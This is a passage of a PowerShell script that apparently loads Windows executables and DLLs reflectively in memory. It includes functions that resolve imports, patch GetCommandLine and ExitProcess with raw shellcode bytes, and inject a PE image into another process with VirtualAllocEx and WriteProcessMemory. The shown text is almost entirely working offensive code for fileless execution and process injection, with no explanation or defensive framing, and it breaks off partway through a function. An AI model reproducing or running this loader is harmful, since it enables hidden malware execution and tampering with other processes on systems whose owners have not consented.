  1271. if ($RemoteLoading -eq $true)
  1272. {
  1273. [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName
  1274. }
  1275. else
  1276. {
  1277. if($ProcedureName -is [string])
  1278. {
  1279.     [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName)
  1280. }
  1281. else
  1282. {
  1283.     [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressOrdinal.Invoke($ImportDllHandle, $ProcedureName)
  1284. }
  1285. }
  1286. if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
  1287. {
  1288. Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
  1289. }
  1290. [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
  1291. $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
  1292. [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
  1293. [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
  1294. }
  1295. $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
  1296. }
  1297. }
  1298. }
  1299. Function Get-VirtualProtectValue
  1300. {
  1301. Param(
  1302. [Parameter(Position = 0, Mandatory = $true)]
  1303. [UInt32]
  1304. $SectionCharacteristics
  1305. )
  1306. $ProtectionFlag = 0x0
  1307. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
  1308. {
  1309. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
  1310. {
  1311. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1312. {
  1313. $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
  1314. }
  1315. else
  1316. {
  1317. $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
  1318. }
  1319. }
  1320. else
  1321. {
  1322. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1323. {
  1324. $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
  1325. }
  1326. else
  1327. {
  1328. $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
  1329. }
  1330. }
  1331. }
  1332. else
  1333. {
  1334. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
  1335. {
  1336. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1337. {
  1338. $ProtectionFlag = $Win32Constants.PAGE_READWRITE
  1339. }
  1340. else
  1341. {
  1342. $ProtectionFlag = $Win32Constants.PAGE_READONLY
  1343. }
  1344. }
  1345. else
  1346. {
  1347. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1348. {
  1349. $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
  1350. }
  1351. else
  1352. {
  1353. $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
  1354. }
  1355. }
  1356. }
  1357. if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
  1358. {
  1359. $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
  1360. }
  1361. return $ProtectionFlag
  1362. }
  1363. Function Update-MemoryProtectionFlags
  1364. {
  1365. Param(
  1366. [Parameter(Position = 0, Mandatory = $true)]
  1367. [System.Object]
  1368. $PEInfo,
  1369. [Parameter(Position = 1, Mandatory = $true)]
  1370. [System.Object]
  1371. $Win32Functions,
  1372. [Parameter(Position = 2, Mandatory = $true)]
  1373. [System.Object]
  1374. $Win32Constants,
  1375. [Parameter(Position = 3, Mandatory = $true)]
  1376. [System.Object]
  1377. $Win32Types
  1378. )
  1379. for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
  1380. {
  1381. [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
  1382. $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
  1383. [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
  1384. [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
  1385. [UInt32]$SectionSize = $SectionHeader.VirtualSize
  1386. [UInt32]$OldProtectFlag = 0
  1387. Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
  1388. $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
  1389. if ($Success -eq $false)
  1390. {
  1391. Throw "Unable to change memory protection"
  1392. }
  1393. }
  1394. }
  1395. Function Update-ExeFunctions
  1396. {
  1397. Param(
  1398. [Parameter(Position = 0, Mandatory = $true)]
  1399. [System.Object]
  1400. $PEInfo,
  1401. [Parameter(Position = 1, Mandatory = $true)]
  1402. [System.Object]
  1403. $Win32Functions,
  1404. [Parameter(Position = 2, Mandatory = $true)]
  1405. [System.Object]
  1406. $Win32Constants,
  1407. [Parameter(Position = 3, Mandatory = $true)]
  1408. [String]
  1409. $ExeArguments,
  1410. [Parameter(Position = 4, Mandatory = $true)]
  1411. [IntPtr]
  1412. $ExeDoneBytePtr
  1413. )
  1414. $ReturnArray = @()
  1415. $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  1416. [UInt32]$OldProtectFlag = 0
  1417. [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
  1418. if ($Kernel32Handle -eq [IntPtr]::Zero)
  1419. {
  1420. throw "Kernel32 handle null"
  1421. }
  1422. [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
  1423. if ($KernelBaseHandle -eq [IntPtr]::Zero)
  1424. {
  1425. throw "KernelBase handle null"
  1426. }
  1427. $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
  1428. $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
  1429. [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
  1430. [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
  1431. if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
  1432. {
  1433. throw "GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr"
  1434. }
  1435. [Byte[]]$Shellcode1 = @()
  1436. if ($PtrSize -eq 8)
  1437. {
  1438. $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8
  1439. }
  1440. $Shellcode1 += 0xb8
  1441. [Byte[]]$Shellcode2 = @(0xc3)
  1442. $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
  1443. $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
  1444. $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
  1445. $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
  1446. $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
  1447. $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
  1448. $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
  1449. [UInt32]$OldProtectFlag = 0
  1450. $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
  1451. if ($Success = $false)
  1452. {
  1453. throw "Call to VirtualProtect failed"
  1454. }
  1455. $GetCommandLineAAddrTemp = $GetCommandLineAAddr
  1456. Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
  1457. $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
  1458. [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
  1459. $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
  1460. Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
  1461. $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  1462. [UInt32]$OldProtectFlag = 0
  1463. $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
  1464. if ($Success = $false)
  1465. {
  1466. throw "Call to VirtualProtect failed"
  1467. }
  1468. $GetCommandLineWAddrTemp = $GetCommandLineWAddr
  1469. Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
  1470. $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
  1471. [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
  1472. $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
  1473. Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
  1474. $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  1475. $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
  1476. , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
  1477. foreach ($Dll in $DllList)
  1478. {
  1479. [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
  1480. if ($DllHandle -ne [IntPtr]::Zero)
  1481. {
  1482. [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
  1483. [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
  1484. if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
  1485. {
  1486. "Error, couldn't find _wcmdln or _acmdln"
  1487. }
  1488. $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
  1489. $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
  1490. $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
  1491. $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
  1492. $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
  1493. $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
  1494. [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
  1495. [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
  1496. $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
  1497. $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
  1498. $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
  1499. if ($Success = $false)
  1500. {
  1501. throw "Call to VirtualProtect failed"
  1502. }
  1503. [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
  1504. $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
  1505. $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
  1506. if ($Success = $false)
  1507. {
  1508. throw "Call to VirtualProtect failed"
  1509. }
  1510. [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
  1511. $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
  1512. }
  1513. }
  1514. $ReturnArray = @()
  1515. $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process
  1516. [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
  1517. if ($MscoreeHandle -eq [IntPtr]::Zero)
  1518. {
  1519. throw "mscoree handle null"
  1520. }
  1521. [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
  1522. if ($CorExitProcessAddr -eq [IntPtr]::Zero)
  1523. {
  1524. Throw "CorExitProcess address not found"
  1525. }
  1526. $ExitFunctions += $CorExitProcessAddr
  1527. [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
  1528. if ($ExitProcessAddr -eq [IntPtr]::Zero)
  1529. {
  1530. Throw "ExitProcess address not found"
  1531. }
  1532. $ExitFunctions += $ExitProcessAddr
  1533. [UInt32]$OldProtectFlag = 0
  1534. foreach ($ProcExitFunctionAddr in $ExitFunctions)
  1535. {
  1536. $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
  1537. [Byte[]]$Shellcode1 = @(0xbb)
  1538. [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
  1539. if ($PtrSize -eq 8)
  1540. {
  1541. [Byte[]]$Shellcode1 = @(0x48, 0xbb)
  1542. [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
  1543. }
  1544. [Byte[]]$Shellcode3 = @(0xff, 0xd3)
  1545. $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
  1546. [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
  1547. if ($ExitThreadAddr -eq [IntPtr]::Zero)
  1548. {
  1549. Throw "ExitThread address not found"
  1550. }
  1551. $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
  1552. if ($Success -eq $false)
  1553. {
  1554. Throw "Call to VirtualProtect failed"
  1555. }
  1556. $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
  1557. $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
  1558. $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
  1559. Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
  1560. $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
  1561. [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
  1562. $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
  1563. Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
  1564. $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
  1565. [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
  1566. $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
  1567. Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
  1568. $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  1569. }
  1570. Write-Output $ReturnArray
  1571. }
  1572. Function Copy-ArrayOfMemAddresses
  1573. {
  1574. Param(
  1575. [Parameter(Position = 0, Mandatory = $true)]
  1576. [Array[]]
  1577. $CopyInfo,
  1578. [Parameter(Position = 1, Mandatory = $true)]
  1579. [System.Object]
  1580. $Win32Functions,
  1581. [Parameter(Position = 2, Mandatory = $true)]
  1582. [System.Object]
  1583. $Win32Constants
  1584. )
  1585. [UInt32]$OldProtectFlag = 0
  1586. foreach ($Info in $CopyInfo)
  1587. {
  1588. $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
  1589. if ($Success -eq $false)
  1590. {
  1591. Throw "Call to VirtualProtect failed"
  1592. }
  1593. $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
  1594. $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  1595. }
  1596. }
  1597. Function Get-MemoryProcAddress
  1598. {
  1599. Param(
  1600. [Parameter(Position = 0, Mandatory = $true)]
  1601. [IntPtr]
  1602. $PEHandle,
  1603. [Parameter(Position = 1, Mandatory = $true)]
  1604. [String]
  1605. $FunctionName
  1606. )
  1607. $Win32Types = Get-Win32Types
  1608. $Win32Constants = Get-Win32Constants
  1609. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  1610. if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
  1611. {
  1612. return [IntPtr]::Zero
  1613. }
  1614. $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
  1615. $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
  1616. for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
  1617. {
  1618. $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
  1619. $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
  1620. $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
  1621. if ($Name -ceq $FunctionName)
  1622. {
  1623. $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
  1624. $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
  1625. $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
  1626. $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
  1627. return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
  1628. }
  1629. }
  1630. return [IntPtr]::Zero
  1631. }
  1632. Function Invoke-MemoryLoadLibrary
  1633. {
  1634. Param(
  1635. [Parameter( Position = 0, Mandatory = $true )]
  1636. [Byte[]]
  1637. $PEBytes,
  1638. [Parameter(Position = 1, Mandatory = $false)]
  1639. [String]
  1640. $ExeArgs,
  1641. [Parameter(Position = 2, Mandatory = $false)]
  1642. [IntPtr]
  1643. $RemoteProcHandle
  1644. )
  1645. $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  1646. $Win32Constants = Get-Win32Constants
  1647. $Win32Functions = Get-Win32Functions
  1648. $Win32Types = Get-Win32Types
  1649. $RemoteLoading = $false
  1650. if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
  1651. {
  1652. $RemoteLoading = $true
  1653. }
  1654. $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
  1655. $OriginalImageBase = $PEInfo.OriginalImageBase
  1656. $NXCompatible = $true
  1657. if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
  1658. {
  1659. Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
  1660. $NXCompatible = $false
  1661. }
  1662. $Process64Bit = $true
  1663. if ($RemoteLoading -eq $true)
  1664. {
  1665. $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
  1666. $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
  1667. if ($Result -eq [IntPtr]::Zero)
  1668. {
  1669. Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
  1670. }
  1671. [Bool]$Wow64Process = $false
  1672. $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
  1673. if ($Success -eq $false)
  1674. {
  1675. Throw "Call to IsWow64Process failed"
  1676. }
  1677. if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
  1678. {
  1679. $Process64Bit = $false
  1680. }
  1681. $PowerShell64Bit = $true
  1682. if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
  1683. {
  1684. $PowerShell64Bit = $false
  1685. }
  1686. if ($PowerShell64Bit -ne $Process64Bit)
  1687. {
  1688. throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
  1689. }
  1690. }
  1691. else
  1692. {
  1693. if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
  1694. {
  1695. $Process64Bit = $false
  1696. }
  1697. }
  1698. if ($Process64Bit -ne $PEInfo.PE64Bit)
  1699. {
  1700. Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
  1701. }
  1702. [IntPtr]$LoadAddr = [IntPtr]::Zero
  1703. if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
  1704. {
  1705. Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue
  1706. [IntPtr]$LoadAddr = $OriginalImageBase
  1707. }
  1708. $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell
  1709. $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.
  1710. if ($RemoteLoading -eq $true)
  1711. {
  1712. $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  1713. $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  1714. if ($EffectivePEHandle -eq [IntPtr]::Zero)
  1715. {
  1716. Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
  1717. }
  1718. }
  1719. else
  1720. {
  1721. if ($NXCompatible -eq $true)
  1722. {
  1723. $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  1724. }
  1725. else
  1726. {
  1727. $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  1728. }
  1729. $EffectivePEHandle = $PEHandle
  1730. }
  1731. [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
  1732. if ($PEHandle -eq [IntPtr]::Zero)
  1733. {
  1734. Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
  1735. }
  1736. [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
  1737. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  1738. $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
  1739. $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
  1740. Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
  1741. Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
  1742. if ($RemoteLoading -eq $true)
  1743. {
  1744. Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
  1745. }
  1746. else
  1747. {
  1748. Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
  1749. }
  1750. if ($RemoteLoading -eq $false)
  1751. {
  1752. if ($NXCompatible -eq $true)
  1753. {
  1754. Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
  1755. }
  1756. else
  1757. {
  1758. }
  1759. }
  1760. else
  1761. {
  1762. }
  1763. if ($RemoteLoading -eq $true)
  1764. {
  1765. [UInt32]$NumBytesWritten = 0
  1766. $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
  1767. if ($Success -eq $false)
  1768. {
  1769. Throw "Unable to write shellcode to remote process memory."
  1770. }
  1771. }
  1772. if ($PEInfo.FileType -ieq "DLL")
  1773. {
  1774. if ($RemoteLoading -eq $false)
  1775. {
  1776. $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  1777. $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
  1778. $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
  1779. $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
  1780. }
  1781. else
  1782. {
